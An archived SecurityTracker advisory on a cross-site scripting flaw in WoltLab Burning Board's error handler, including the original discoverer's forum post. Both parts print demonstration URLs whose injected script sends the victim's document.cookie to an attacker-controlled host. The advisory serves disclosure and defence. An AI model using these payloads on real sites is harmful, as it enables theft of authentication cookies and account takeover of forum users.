SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WoltLab Burning Board (wBB) Vendors:   Woltlab
Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015789
SecurityTracker URL:  http://securitytracker.com/id/1015789
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 20 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   A vulnerability was reported in Woltlab Burning Board. A remote user can conduct cross-site scripting attacks.

The 'wbb/acp/lib/class_db_mysql.php' script does not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Woltlab Burning Board software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit is provided:

/wbb/xx.php?<script>location.href='http://[attacker]/xss.php?cook='+escape(document.cookie)</script>

http://[target]/filebase_redirect.php?fid='<script>location.href='http://[attacker]/xss.php?cook='+escape(document.cookie)</script>

Tontonq reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Woltlab Burning Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.woltlab.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Xss in Wbb 2.3.4

hi again friends
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php

in the 123.line

$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";

hmm what can we do with that?
if there is an sql db error you may do 

/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

or you may use filebase mod for make an sql error

like that 

http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

WwW.SpyMasterSnake.org 
Tontonq ;)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC